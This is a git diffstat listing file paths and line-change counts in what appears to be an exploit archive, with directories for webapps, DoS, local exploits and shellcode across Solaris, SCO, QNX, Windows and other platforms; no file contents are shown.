+- platforms/php/webapps/9703.txt | 46 +- platforms/php/webapps/9706.txt | 52 +- platforms/php/webapps/9708.txt | 88 +- platforms/php/webapps/9710.txt | 52 +- platforms/php/webapps/9711.txt | 64 +- platforms/php/webapps/9712.txt | 54 +- platforms/php/webapps/9713.pl | 302 +- platforms/php/webapps/982.c | 6 +- platforms/php/webapps/989.pl | 6 +- platforms/php/webapps/9890.txt | 1 - platforms/php/webapps/996.pl | 6 +- platforms/plan9/local/3383.c | 1740 +-- platforms/qnx/dos/7823.txt | 392 +- platforms/qnx/local/1347.c | 180 +- platforms/qnx/local/1479.sh | 44 +- platforms/qnx/local/1481.sh | 42 +- platforms/sco/local/1402.c | 118 +- platforms/sco/local/1534.c | 176 +- platforms/sco/local/261.c | 6 +- platforms/sco/local/5355.sh | 46 +- platforms/sco/local/5356.c | 168 +- platforms/sco/local/5357.c | 178 +- platforms/sco/local/602.c | 6 +- platforms/sco_x86/shellcode/13488.c | 70 +- platforms/solaris/dos/235.pl | 6 +- platforms/solaris/dos/240.sh | 6 +- platforms/solaris/dos/6775.c | 182 +- platforms/solaris/dos/8597.c | 206 +- platforms/solaris/dos/8598.c | 168 +- platforms/solaris/local/1073.c | 6 +- platforms/solaris/local/1074.c | 6 +- platforms/solaris/local/1092.c | 6 +- platforms/solaris/local/114.c | 6 +- platforms/solaris/local/1182.c | 6 +- platforms/solaris/local/1248.pl | 134 +- platforms/solaris/local/1360.c | 306 +- platforms/solaris/local/197.c | 6 +- platforms/solaris/local/2067.c | 94 +- platforms/solaris/local/210.c | 6 +- platforms/solaris/local/2242.sh | 70 +- platforms/solaris/local/247.c | 6 +- platforms/solaris/local/250.c | 6 +- platforms/solaris/local/256.c | 6 +- platforms/solaris/local/328.c | 6 +- platforms/solaris/local/330.sh | 6 +- platforms/solaris/local/332.sh | 6 +- platforms/solaris/local/338.c | 6 +- platforms/solaris/local/4515.c | 122 +- platforms/solaris/local/4516.c | 210 +- platforms/solaris/local/713.c | 6 +- platforms/solaris/local/714.c | 6 +- platforms/solaris/local/715.c | 6 +- platforms/solaris/local/972.c | 6 +- 
platforms/solaris/remote/101.pl | 6 +- platforms/solaris/remote/1167.pm | 6 +- platforms/solaris/remote/213.c | 6 +- platforms/solaris/remote/239.c | 6 +- platforms/solaris/remote/263.pl | 6 +- platforms/solaris/remote/280.c | 6 +- platforms/solaris/remote/301.c | 6 +- platforms/solaris/remote/57.txt | 52 +- platforms/solaris/remote/6328.c | 610 +- platforms/solaris_sparc/shellcode/13489.c | 108 +- platforms/solaris_sparc/shellcode/13491.c | 322 +- platforms/solaris_sparc/shellcode/13492.c | 64 +- platforms/solaris_sparc/shellcode/13493.c | 158 +- platforms/solaris_sparc/shellcode/13494.txt | 4 +- platforms/solaris_sparc/shellcode/13495.c | 4 +- platforms/solaris_sparc/shellcode/13496.c | 4 +- platforms/solaris_sparc/shellcode/13497.txt | 4 +- platforms/solaris_x86/shellcode/13498.php | 130 +- platforms/solaris_x86/shellcode/13499.c | 120 +- platforms/solaris_x86/shellcode/13500.c | 144 +- platforms/solaris_x86/shellcode/13501.txt | 4 +- platforms/solaris_x86/shellcode/13502.txt | 4 +- platforms/tru64/local/1624.pl | 60 +- platforms/tru64/local/1625.pl | 64 +- platforms/tru64/local/259.c | 6 +- platforms/tru64/local/281.c | 6 +- platforms/unix/local/302.c | 6 +- platforms/unixware/shellcode/13503.txt | 4 +- platforms/win32/shellcode/13504.asm | 470 +- platforms/win32/shellcode/13505.c | 62 +- platforms/win32/shellcode/13508.asm | 62 +- platforms/win32/shellcode/13509.c | 72 +- platforms/win32/shellcode/13510.c | 86 +- platforms/win32/shellcode/13511.c | 50 +- platforms/win32/shellcode/13512.c | 168 +- platforms/win32/shellcode/13513.c | 144 +- platforms/win32/shellcode/13514.asm | 507 +- platforms/win32/shellcode/13515.pl | 202 +- platforms/win32/shellcode/13516.asm | 274 +- platforms/win32/shellcode/13517.asm | 298 +- platforms/win32/shellcode/13518.c | 38 +- platforms/win32/shellcode/13519.c | 68 +- platforms/win32/shellcode/13520.c | 70 +- platforms/win32/shellcode/13521.asm | 218 +- platforms/win32/shellcode/13522.c | 78 +- platforms/win32/shellcode/13523.c | 
82 +- platforms/win32/shellcode/13525.c | 4 +- platforms/win32/shellcode/13526.c | 4 +- platforms/win32/shellcode/13527.c | 4 +- platforms/win32/shellcode/13528.c | 4 +- platforms/win32/shellcode/13529.c | 4 +- platforms/win32/shellcode/13530.asm | 4 +- platforms/win32/shellcode/13531.c | 4 +- platforms/win32/shellcode/13532.asm | 4 +- platforms/win64/shellcode/13533.asm | 318 +- platforms/windows/dos/1024.html | 6 +- platforms/windows/dos/1025.html | 6 +- platforms/windows/dos/1065.c | 6 +- platforms/windows/dos/1067.cpp | 6 +- platforms/windows/dos/1090.cpp | 6 +- platforms/windows/dos/1093.c | 6 +- platforms/windows/dos/1094.pl | 6 +- platforms/windows/dos/1100.pl | 6 +- platforms/windows/dos/1101.c | 6 +- platforms/windows/dos/1104.cpp | 6 +- platforms/windows/dos/1105.c | 6 +- platforms/windows/dos/1107.pl | 6 +- platforms/windows/dos/1109.pl | 6 +- platforms/windows/dos/111.c | 6 +- platforms/windows/dos/1110.txt | 6 +- platforms/windows/dos/1116.c | 6 +- platforms/windows/dos/1121.pl | 6 +- platforms/windows/dos/1126.c | 6 +- platforms/windows/dos/1127.cpp | 6 +- platforms/windows/dos/1129.c | 6 +- platforms/windows/dos/113.pl | 6 +- platforms/windows/dos/1137.pl | 6 +- platforms/windows/dos/1143.sys | 6 +- platforms/windows/dos/1156.c | 6 +- platforms/windows/dos/1158.pl | 6 +- platforms/windows/dos/1159.pl | 6 +- platforms/windows/dos/1162.pl | 6 +- platforms/windows/dos/1164.pl | 6 +- platforms/windows/dos/1192.cpp | 6 +- platforms/windows/dos/1199.c | 6 +- platforms/windows/dos/1212.pl | 6 +- platforms/windows/dos/1218.c | 256 +- platforms/windows/dos/1220.pl | 82 +- platforms/windows/dos/1222.pl | 76 +- platforms/windows/dos/1235.c | 464 +- platforms/windows/dos/1239.c | 468 +- platforms/windows/dos/1246.pl | 130 +- platforms/windows/dos/1251.pl | 76 +- platforms/windows/dos/1255.html | 52 +- platforms/windows/dos/1266.py | 200 +- platforms/windows/dos/1271.c | 764 +- platforms/windows/dos/1281.c | 578 +- platforms/windows/dos/1283.c | 566 +- 
platforms/windows/dos/1284.c | 450 +- platforms/windows/dos/1285.c | 1070 +- platforms/windows/dos/1286.c | 392 +- platforms/windows/dos/1287.c | 416 +- platforms/windows/dos/1327.pl | 74 +- platforms/windows/dos/1328.c | 660 +- platforms/windows/dos/1341.c | 416 +- platforms/windows/dos/1343.c | 150 +- platforms/windows/dos/1353.py | 88 +- platforms/windows/dos/1368.cpp | 252 +- platforms/windows/dos/1371.c | 176 +- platforms/windows/dos/1372.html | 44 +- platforms/windows/dos/1376.c | 276 +- platforms/windows/dos/1377.pl | 96 +- platforms/windows/dos/1396.cpp | 244 +- platforms/windows/dos/1409.pl | 98 +- platforms/windows/dos/1416.c | 182 +- platforms/windows/dos/1422.c | 184 +- platforms/windows/dos/1423.html | 26 +- platforms/windows/dos/147.c | 6 +- platforms/windows/dos/1475.html | 46 +- platforms/windows/dos/148.sh | 6 +- platforms/windows/dos/153.c | 6 +- platforms/windows/dos/1552.pl | 54 +- platforms/windows/dos/1557.c | 436 +- platforms/windows/dos/1558.c | 918 +- platforms/windows/dos/1559.c | 810 +- platforms/windows/dos/1560.c | 512 +- platforms/windows/dos/1564.c | 1192 +- platforms/windows/dos/1593.c | 204 +- platforms/windows/dos/1601.c | 364 +- platforms/windows/dos/161.c | 6 +- platforms/windows/dos/1613.c | 1074 +- platforms/windows/dos/1614.c | 898 +- platforms/windows/dos/1642.c | 468 +- platforms/windows/dos/1643.c | 366 +- platforms/windows/dos/1688.c | 208 +- platforms/windows/dos/1721.pl | 100 +- platforms/windows/dos/1749.pl | 102 +- platforms/windows/dos/1757.c | 228 +- platforms/windows/dos/1758.pl | 72 +- platforms/windows/dos/176.c | 6 +- platforms/windows/dos/1775.html | 84 +- platforms/windows/dos/1856.url | 48 +- platforms/windows/dos/1949.pl | 62 +- platforms/windows/dos/1967.c | 264 +- platforms/windows/dos/1976.cpp | 166 +- platforms/windows/dos/1977.cpp | 186 +- platforms/windows/dos/1980.pl | 98 +- platforms/windows/dos/1984.py | 264 +- platforms/windows/dos/1989.html | 76 +- platforms/windows/dos/1990.html | 98 +- 
platforms/windows/dos/2001.c | 5380 +++---- platforms/windows/dos/2037.c | 646 +- platforms/windows/dos/2039.pl | 76 +- platforms/windows/dos/214.c | 6 +- platforms/windows/dos/2160.c | 338 +- platforms/windows/dos/2194.pl | 408 +- platforms/windows/dos/2195.html | 130 +- platforms/windows/dos/2204.c | 434 +- platforms/windows/dos/2208.html | 64 +- platforms/windows/dos/2210.c | 404 +- platforms/windows/dos/2238.html | 176 +- platforms/windows/dos/2302.pl | 142 +- platforms/windows/dos/233.pl | 6 +- platforms/windows/dos/2400.html | 62 +- platforms/windows/dos/2523.pl | 928 +- platforms/windows/dos/2629.html | 62 +- platforms/windows/dos/2650.c | 456 +- platforms/windows/dos/2672.py | 86 +- platforms/windows/dos/2682.pl | 148 +- platforms/windows/dos/2734.py | 172 +- platforms/windows/dos/276.delphi | 6 +- platforms/windows/dos/2783.html | 92 +- platforms/windows/dos/2787.c | 270 +- platforms/windows/dos/2860.c | 198 +- platforms/windows/dos/2861.c | 224 +- platforms/windows/dos/2879.py | 352 +- platforms/windows/dos/2926.py | 66 +- platforms/windows/dos/2934.php | 210 +- platforms/windows/dos/2935.sh | 24 +- platforms/windows/dos/2946.html | 52 +- platforms/windows/dos/2966.html | 50 +- platforms/windows/dos/2967.cs | 46 +- platforms/windows/dos/299.c | 6 +- platforms/windows/dos/3013.py | 254 +- platforms/windows/dos/3034.py | 40 +- platforms/windows/dos/3038.php | 82 +- platforms/windows/dos/3052.c | 520 +- platforms/windows/dos/3056.pl | 86 +- platforms/windows/dos/3078.pl | 164 +- platforms/windows/dos/3111.pl | 28 +- platforms/windows/dos/3112.py | 64 +- platforms/windows/dos/3119.py | 102 +- platforms/windows/dos/3126.c | 196 +- platforms/windows/dos/3128.c | 160 +- platforms/windows/dos/3138.pl | 48 +- platforms/windows/dos/3157.html | 50 +- platforms/windows/dos/3190.py | 28 +- platforms/windows/dos/3229.py | 90 +- platforms/windows/dos/324.txt | 6 +- platforms/windows/dos/3248.rb | 128 +- platforms/windows/dos/3254.py | 80 +- platforms/windows/dos/329.txt 
| 6 +- platforms/windows/dos/3304.py | 58 +- platforms/windows/dos/3308.pl | 148 +- platforms/windows/dos/3341.cpp | 362 +- platforms/windows/dos/3343.cpp | 238 +- platforms/windows/dos/3347.cpp | 182 +- platforms/windows/dos/3350.html | 98 +- platforms/windows/dos/3392.html | 180 +- platforms/windows/dos/3418.pl | 168 +- platforms/windows/dos/3433.html | 62 +- platforms/windows/dos/345.c | 6 +- platforms/windows/dos/3453.py | 404 +- platforms/windows/dos/3461.pl | 98 +- platforms/windows/dos/35.c | 6 +- platforms/windows/dos/3514.pl | 100 +- platforms/windows/dos/3527.pl | 182 +- platforms/windows/dos/354.html | 6 +- platforms/windows/dos/357.c | 6 +- platforms/windows/dos/3602.py | 120 +- platforms/windows/dos/362.sh | 6 +- platforms/windows/dos/365.html | 6 +- platforms/windows/dos/3684.c | 108 +- platforms/windows/dos/3770.pl | 292 +- platforms/windows/dos/3782.pl | 122 +- platforms/windows/dos/3788.html | 116 +- platforms/windows/dos/3789.html | 114 +- platforms/windows/dos/3790.html | 132 +- platforms/windows/dos/3819.py | 250 +- platforms/windows/dos/3826.html | 126 +- platforms/windows/dos/3830.html | 122 +- platforms/windows/dos/3836.html | 150 +- platforms/windows/dos/3845.html | 120 +- platforms/windows/dos/385.c | 6 +- platforms/windows/dos/3873.html | 34 +- platforms/windows/dos/3883.html | 134 +- platforms/windows/dos/3890.html | 106 +- platforms/windows/dos/3898.html | 198 +- platforms/windows/dos/3910.html | 70 +- platforms/windows/dos/3917.html | 82 +- platforms/windows/dos/3930.txt | 56 +- platforms/windows/dos/3937.html | 64 +- platforms/windows/dos/3939.py | 224 +- platforms/windows/dos/3940.py | 260 +- platforms/windows/dos/39565.txt | 90 + platforms/windows/dos/3969.html | 76 +- platforms/windows/dos/3976.pl | 344 +- platforms/windows/dos/3977.pl | 282 +- platforms/windows/dos/3978.pl | 204 +- platforms/windows/dos/3979.html | 72 +- platforms/windows/dos/3986.html | 68 +- platforms/windows/dos/4009.html | 70 +- platforms/windows/dos/4012.html 
| 60 +- platforms/windows/dos/4017.cpp | 198 +- platforms/windows/dos/4033.rb | 118 +- platforms/windows/dos/4046.pl | 78 +- platforms/windows/dos/4047.c | 258 +- platforms/windows/dos/4056.html | 44 +- platforms/windows/dos/4058.py | 242 +- platforms/windows/dos/4067.html | 26 +- platforms/windows/dos/4118.html | 28 +- platforms/windows/dos/4126.c | 156 +- platforms/windows/dos/4137.html | 86 +- platforms/windows/dos/4148.html | 156 +- platforms/windows/dos/4149.html | 152 +- platforms/windows/dos/4168.vbs | 256 +- platforms/windows/dos/419.pl | 6 +- platforms/windows/dos/4205.pl | 94 +- platforms/windows/dos/4215.pl | 98 +- platforms/windows/dos/422.c | 6 +- platforms/windows/dos/4227.php | 118 +- platforms/windows/dos/423.pl | 6 +- platforms/windows/dos/4251.html | 62 +- platforms/windows/dos/427.c | 6 +- platforms/windows/dos/4272.c | 856 +- platforms/windows/dos/428.c | 6 +- platforms/windows/dos/4281.c | 362 +- platforms/windows/dos/4285.c | 384 +- platforms/windows/dos/4288.c | 210 +- platforms/windows/dos/429.c | 6 +- platforms/windows/dos/4293.php | 48 +- platforms/windows/dos/4294.pl | 58 +- platforms/windows/dos/4304.php | 88 +- platforms/windows/dos/4318.php | 64 +- platforms/windows/dos/4344.php | 78 +- platforms/windows/dos/4373.html | 122 +- platforms/windows/dos/4379.html | 160 +- platforms/windows/dos/4403.py | 128 +- platforms/windows/dos/4409.html | 296 +- platforms/windows/dos/4474.html | 86 +- platforms/windows/dos/4479.html | 46 +- platforms/windows/dos/4498.pl | 132 +- platforms/windows/dos/4569.pl | 220 +- platforms/windows/dos/4610.html | 230 +- platforms/windows/dos/4613.html | 36 +- platforms/windows/dos/463.c | 6 +- platforms/windows/dos/4682.c | 4 +- platforms/windows/dos/4683.py | 88 +- platforms/windows/dos/4688.html | 136 +- platforms/windows/dos/4716.html | 132 +- platforms/windows/dos/4717.py | 50 +- platforms/windows/dos/474.sh | 6 +- platforms/windows/dos/4742.py | 210 +- platforms/windows/dos/4748.php | 62 +- 
platforms/windows/dos/4757.txt | 370 +- platforms/windows/dos/4801.html | 144 +- platforms/windows/dos/4829.html | 76 +- platforms/windows/dos/4885.txt | 180 +- platforms/windows/dos/4911.c | 152 +- platforms/windows/dos/4931.txt | 380 +- platforms/windows/dos/5036.pl | 78 +- platforms/windows/dos/5043.html | 94 +- platforms/windows/dos/5044.pl | 78 +- platforms/windows/dos/5063.pl | 60 +- platforms/windows/dos/5086.html | 92 +- platforms/windows/dos/5110.txt | 138 +- platforms/windows/dos/5122.pl | 46 +- platforms/windows/dos/5142.c | 146 +- platforms/windows/dos/5184.py | 56 +- platforms/windows/dos/5201.txt | 44 +- platforms/windows/dos/5217.html | 30 +- platforms/windows/dos/5225.html | 136 +- platforms/windows/dos/5261.py | 40 +- platforms/windows/dos/5270.pl | 78 +- platforms/windows/dos/5321.txt | 34 +- platforms/windows/dos/5341.pl | 80 +- platforms/windows/dos/5349.py | 62 +- platforms/windows/dos/5396.txt | 236 +- platforms/windows/dos/5438.py | 80 +- platforms/windows/dos/5453.pl | 40 +- platforms/windows/dos/5455.py | 46 +- platforms/windows/dos/5460.html | 34 +- platforms/windows/dos/5472.py | 102 +- platforms/windows/dos/5515.txt | 64 +- platforms/windows/dos/562.c | 6 +- platforms/windows/dos/5682.html | 34 +- platforms/windows/dos/5709.pl | 74 +- platforms/windows/dos/571.c | 6 +- platforms/windows/dos/5718.pl | 56 +- platforms/windows/dos/5727.pl | 92 +- platforms/windows/dos/578.pl | 6 +- platforms/windows/dos/5817.pl | 76 +- platforms/windows/dos/5843.html | 38 +- platforms/windows/dos/585.pl | 6 +- platforms/windows/dos/5851.txt | 168 +- platforms/windows/dos/5918.pl | 82 +- platforms/windows/dos/594.pl | 6 +- platforms/windows/dos/5968.py | 50 +- platforms/windows/dos/603.c | 6 +- platforms/windows/dos/604.c | 6 +- platforms/windows/dos/605.c | 6 +- platforms/windows/dos/6059.pl | 110 +- platforms/windows/dos/606.c | 6 +- platforms/windows/dos/607.c | 6 +- platforms/windows/dos/6072.html | 34 +- platforms/windows/dos/6077.c | 146 +- 
platforms/windows/dos/6083.html | 114 +- platforms/windows/dos/6090.html | 30 +- platforms/windows/dos/61.c | 6 +- platforms/windows/dos/611.c | 6 +- platforms/windows/dos/6181.php | 218 +- platforms/windows/dos/6201.html | 48 +- platforms/windows/dos/6216.html | 64 +- platforms/windows/dos/6244.js | 24 +- platforms/windows/dos/625.pl | 6 +- platforms/windows/dos/6251.txt | 502 +- platforms/windows/dos/6253.txt | 62 +- platforms/windows/dos/6257.pl | 82 +- platforms/windows/dos/626.c | 6 +- platforms/windows/dos/6262.txt | 320 +- platforms/windows/dos/6319.html | 54 +- platforms/windows/dos/6326.html | 70 +- platforms/windows/dos/6327.html | 60 +- platforms/windows/dos/634.pl | 6 +- platforms/windows/dos/6345.html | 118 +- platforms/windows/dos/6365.php | 42 +- platforms/windows/dos/6372.html | 78 +- platforms/windows/dos/6386.html | 72 +- platforms/windows/dos/6391.htm | 136 +- platforms/windows/dos/6424.html | 38 +- platforms/windows/dos/6434.html | 160 +- platforms/windows/dos/6458.c | 154 +- platforms/windows/dos/6463.rb | 318 +- platforms/windows/dos/6474.rb | 130 +- platforms/windows/dos/649.c | 6 +- platforms/windows/dos/6496.c | 188 +- platforms/windows/dos/6497.c | 278 +- platforms/windows/dos/6498.c | 202 +- platforms/windows/dos/651.c | 6 +- platforms/windows/dos/6515.c | 480 +- platforms/windows/dos/653.c | 6 +- platforms/windows/dos/655.c | 6 +- platforms/windows/dos/6554.html | 80 +- platforms/windows/dos/6581.pl | 44 +- platforms/windows/dos/6588.txt | 3140 ++-- platforms/windows/dos/6609.html | 178 +- platforms/windows/dos/6614.html | 236 +- platforms/windows/dos/6615.html | 182 +- platforms/windows/dos/662.pl | 6 +- platforms/windows/dos/664.c | 6 +- platforms/windows/dos/6647.c | 504 +- platforms/windows/dos/665.c | 6 +- platforms/windows/dos/6651.pl | 86 +- platforms/windows/dos/6660.txt | 32 +- platforms/windows/dos/6668.txt | 52 +- platforms/windows/dos/667.c | 6 +- platforms/windows/dos/6671.c | 154 +- platforms/windows/dos/6672.txt | 196 +- 
platforms/windows/dos/6673.txt | 78 +- platforms/windows/dos/6717.py | 118 +- platforms/windows/dos/6719.py | 152 +- platforms/windows/dos/672.c | 6 +- platforms/windows/dos/6741.py | 80 +- platforms/windows/dos/6742.py | 112 +- platforms/windows/dos/6752.pl | 80 +- platforms/windows/dos/6753.py | 92 +- platforms/windows/dos/6756.txt | 584 +- platforms/windows/dos/6761.html | 40 +- platforms/windows/dos/6800.pl | 40 +- platforms/windows/dos/6812.pl | 40 +- platforms/windows/dos/6815.pl | 40 +- platforms/windows/dos/6832.html | 114 +- platforms/windows/dos/6834.c | 176 +- platforms/windows/dos/6838.rb | 92 +- platforms/windows/dos/6863.pl | 32 +- platforms/windows/dos/6926.pl | 88 +- platforms/windows/dos/700.html | 6 +- platforms/windows/dos/7090.txt | 130 +- platforms/windows/dos/7099.pl | 126 +- platforms/windows/dos/7109.txt | 76 +- platforms/windows/dos/7126.html | 78 +- platforms/windows/dos/7207.pl | 84 +- platforms/windows/dos/7209.pl | 110 +- platforms/windows/dos/7213.pl | 102 +- platforms/windows/dos/7219.pl | 134 +- platforms/windows/dos/7226.html | 88 +- platforms/windows/dos/7249.php | 74 +- platforms/windows/dos/7262.pl | 114 +- platforms/windows/dos/7296.txt | 186 +- platforms/windows/dos/7297.py | 76 +- platforms/windows/dos/7307.txt | 90 +- platforms/windows/dos/7314.txt | 232 +- platforms/windows/dos/7358.html | 78 +- platforms/windows/dos/7362.py | 108 +- platforms/windows/dos/7387.py | 88 +- platforms/windows/dos/7401.txt | 458 +- platforms/windows/dos/742.c | 6 +- platforms/windows/dos/7460.html | 196 +- platforms/windows/dos/7554.pl | 54 +- platforms/windows/dos/7556.php | 210 +- platforms/windows/dos/7578.pl | 60 +- platforms/windows/dos/7592.pl | 42 +- platforms/windows/dos/7637.pl | 98 +- platforms/windows/dos/7693.pl | 90 +- platforms/windows/dos/7694.py | 114 +- platforms/windows/dos/7708.pl | 64 +- platforms/windows/dos/7710.html | 6 +- platforms/windows/dos/7720.pl | 52 +- platforms/windows/dos/7721.pl | 68 +- 
platforms/windows/dos/7737.py | 48 +- platforms/windows/dos/7750.html | 84 +- platforms/windows/dos/7756.py | 128 +- platforms/windows/dos/7790.txt | 404 +- platforms/windows/dos/7799.pl | 92 +- platforms/windows/dos/7852.pl | 128 +- platforms/windows/dos/7854.pl | 32 +- platforms/windows/dos/7857.pl | 78 +- platforms/windows/dos/7869.html | 92 +- platforms/windows/dos/7902.txt | 550 +- platforms/windows/dos/7904.pl | 40 +- platforms/windows/dos/7934.py | 66 +- platforms/windows/dos/7942.pl | 88 +- platforms/windows/dos/797.py | 6 +- platforms/windows/dos/7985.pl | 114 +- platforms/windows/dos/7986.pl | 92 +- platforms/windows/dos/7990.py | 68 +- platforms/windows/dos/7995.pl | 140 +- platforms/windows/dos/8024.py | 110 +- platforms/windows/dos/8058.pl | 56 +- platforms/windows/dos/8084.pl | 40 +- platforms/windows/dos/810.c | 6 +- platforms/windows/dos/8102.txt | 28 +- platforms/windows/dos/8129.pl | 110 +- platforms/windows/dos/813.c | 6 +- platforms/windows/dos/8135.pl | 176 +- platforms/windows/dos/8156.txt | 68 +- platforms/windows/dos/8190.txt | 152 +- platforms/windows/dos/82.c | 6 +- platforms/windows/dos/8212.pl | 96 +- platforms/windows/dos/8213.pl | 72 +- platforms/windows/dos/8224.pl | 88 +- platforms/windows/dos/8225.py | 32 +- platforms/windows/dos/8294.c | 212 +- platforms/windows/dos/8300.py | 56 +- platforms/windows/dos/8314.php | 106 +- platforms/windows/dos/8325.py | 127 +- platforms/windows/dos/8335.c | 658 +- platforms/windows/dos/8352.txt | 328 +- platforms/windows/dos/8358.pl | 266 +- platforms/windows/dos/8360.pl | 182 +- platforms/windows/dos/8370.pl | 40 +- platforms/windows/dos/8378.pl | 54 +- platforms/windows/dos/8390.cpp | 278 +- platforms/windows/dos/8391.txt | 182 +- platforms/windows/dos/8402.pl | 74 +- platforms/windows/dos/8404.pl | 74 +- platforms/windows/dos/8405.pl | 74 +- platforms/windows/dos/8407.pl | 74 +- platforms/windows/dos/8434.html | 50 +- platforms/windows/dos/8445.pl | 46 +- platforms/windows/dos/8451.pl | 104 +- 
platforms/windows/dos/8452.c | 2086 +-- platforms/windows/dos/8462.pl | 234 +- platforms/windows/dos/8466.pl | 92 +- platforms/windows/dos/8479.html | 1338 +- platforms/windows/dos/8484.pl | 24 +- platforms/windows/dos/8485.pl | 24 +- platforms/windows/dos/849.c | 6 +- platforms/windows/dos/8511.pl | 84 +- platforms/windows/dos/852.py | 6 +- platforms/windows/dos/8523.txt | 140 +- platforms/windows/dos/8524.txt | 94 +- platforms/windows/dos/8526.py | 50 +- platforms/windows/dos/8542.php | 106 +- platforms/windows/dos/8568.pl | 24 +- platforms/windows/dos/8573.html | 42 +- platforms/windows/dos/8578.pl | 24 +- platforms/windows/dos/8601.txt | 28 +- platforms/windows/dos/8606.py | 68 +- platforms/windows/dos/8607.pl | 28 +- platforms/windows/dos/861.c | 6 +- platforms/windows/dos/8611.pl | 70 +- platforms/windows/dos/8617.pl | 60 +- platforms/windows/dos/8625.pl | 24 +- platforms/windows/dos/8650.c | 216 +- platforms/windows/dos/8665.html | 172 +- platforms/windows/dos/8677.txt | 50 +- platforms/windows/dos/8712.txt | 136 +- platforms/windows/dos/8722.py | 40 +- platforms/windows/dos/8798.rb | 176 +- platforms/windows/dos/882.cpp | 6 +- platforms/windows/dos/8832.php | 100 +- platforms/windows/dos/886.pl | 6 +- platforms/windows/dos/887.py | 6 +- platforms/windows/dos/8899.txt | 158 +- platforms/windows/dos/891.pl | 6 +- platforms/windows/dos/893.pl | 6 +- platforms/windows/dos/8971.pl | 132 +- platforms/windows/dos/899.pl | 6 +- platforms/windows/dos/9006.py | 306 +- platforms/windows/dos/9029.rb | 84 +- platforms/windows/dos/9033.pl | 52 +- platforms/windows/dos/9061.pl | 26 +- platforms/windows/dos/908.c | 6 +- platforms/windows/dos/9090.pl | 24 +- platforms/windows/dos/9100.html | 92 +- platforms/windows/dos/9102.pl | 68 +- platforms/windows/dos/9113.txt | 184 +- platforms/windows/dos/9114.txt | 284 +- platforms/windows/dos/9116.html | 82 +- platforms/windows/dos/9123.pl | 30 +- platforms/windows/dos/9124.pl | 32 +- platforms/windows/dos/9131.py | 148 +- 
platforms/windows/dos/9133.pl | 60 +- platforms/windows/dos/9141.pl | 26 +- platforms/windows/dos/9147.pl | 22 +- platforms/windows/dos/9157.pl | 18 +- platforms/windows/dos/916.pl | 6 +- platforms/windows/dos/9163.txt | 88 +- platforms/windows/dos/9168.pl | 76 +- platforms/windows/dos/9173.pl | 26 +- platforms/windows/dos/9178.pl | 80 +- platforms/windows/dos/9189.pl | 20 +- platforms/windows/dos/9192.pl | 20 +- platforms/windows/dos/9200.pl | 24 +- platforms/windows/dos/9212.pl | 80 +- platforms/windows/dos/9220.pl | 54 +- platforms/windows/dos/9222.cpp | 372 +- platforms/windows/dos/9240.py | 60 +- platforms/windows/dos/9242.py | 54 +- platforms/windows/dos/9277.pl | 50 +- platforms/windows/dos/9295.txt | 864 +- platforms/windows/dos/9304.txt | 94 +- platforms/windows/dos/9317.c | 588 +- platforms/windows/dos/9345.pl | 46 +- platforms/windows/dos/9359.pl | 50 +- platforms/windows/dos/9361.pl | 24 +- platforms/windows/dos/9362.html | 36 +- platforms/windows/dos/9376.py | 50 +- platforms/windows/dos/941.c | 6 +- platforms/windows/dos/9411.cpp | 654 +- platforms/windows/dos/9423.pl | 70 +- platforms/windows/dos/9446.cpp | 316 +- platforms/windows/dos/9449.txt | 178 +- platforms/windows/dos/9455.html | 48 +- platforms/windows/dos/9496.txt | 124 +- platforms/windows/dos/9515.txt | 186 +- platforms/windows/dos/9516.txt | 130 +- platforms/windows/dos/9517.txt | 116 +- platforms/windows/dos/9528.py | 58 +- platforms/windows/dos/9537.htm | 124 +- platforms/windows/dos/9539.py | 60 +- platforms/windows/dos/9546.pl | 42 +- platforms/windows/dos/9549.c | 908 +- platforms/windows/dos/9554.html | 48 +- platforms/windows/dos/9561.py | 82 +- platforms/windows/dos/9573.pl | 110 +- platforms/windows/dos/9584.txt | 56 +- platforms/windows/dos/9585.txt | 62 +- platforms/windows/dos/9597.txt | 82 +- platforms/windows/dos/9606.pl | 68 +- platforms/windows/dos/9607.pl | 66 +- platforms/windows/dos/9620.pl | 64 +- platforms/windows/dos/9626.py | 56 +- platforms/windows/dos/9657.pl | 48 
+- platforms/windows/dos/9667.c | 212 +- platforms/windows/dos/9668.txt | 140 +- platforms/windows/dos/9670.txt | 126 +- platforms/windows/dos/9671.py | 24 +- platforms/windows/dos/9672.py | 106 +- platforms/windows/dos/9677.c | 453 +- platforms/windows/dos/9682.txt | 104 +- platforms/windows/dos/9683.txt | 150 +- platforms/windows/dos/9684.txt | 166 +- platforms/windows/dos/9685.txt | 162 +- platforms/windows/dos/9686.py | 46 +- platforms/windows/dos/9689.pl | 32 +- platforms/windows/dos/9691.pl | 80 +- platforms/windows/dos/9701.c | 1116 +- platforms/windows/dos/9707.pl | 34 +- platforms/windows/dos/978.cpp | 6 +- platforms/windows/dos/983.cpp | 6 +- platforms/windows/dos/988.cpp | 6 +- platforms/windows/local/1019.c | 6 +- platforms/windows/local/1032.cpp | 6 +- platforms/windows/local/1034.cpp | 6 +- platforms/windows/local/1085.c | 6 +- platforms/windows/local/1086.c | 6 +- platforms/windows/local/1091.c | 6 +- platforms/windows/local/1128.c | 6 +- platforms/windows/local/1161.c | 6 +- platforms/windows/local/1168.c | 6 +- platforms/windows/local/1173.c | 6 +- platforms/windows/local/1174.c | 6 +- platforms/windows/local/1197.c | 6 +- platforms/windows/local/1198.c | 6 +- platforms/windows/local/122.c | 6 +- platforms/windows/local/1406.php | 98 +- platforms/windows/local/1407.c | 900 +- platforms/windows/local/1455.txt | 174 +- platforms/windows/local/1465.c | 988 +- platforms/windows/local/1470.c | 216 +- platforms/windows/local/1490.c | 142 +- platforms/windows/local/1495.cpp | 128 +- platforms/windows/local/1555.c | 278 +- platforms/windows/local/172.c | 6 +- platforms/windows/local/1772.c | 344 +- platforms/windows/local/1910.c | 212 +- platforms/windows/local/1917.pl | 140 +- platforms/windows/local/1944.c | 670 +- platforms/windows/local/1958.pl | 580 +- platforms/windows/local/1978.pl | 192 +- platforms/windows/local/1986.cpp | 940 +- platforms/windows/local/1988.pl | 576 +- platforms/windows/local/1992.py | 180 +- platforms/windows/local/1999.pl | 254 
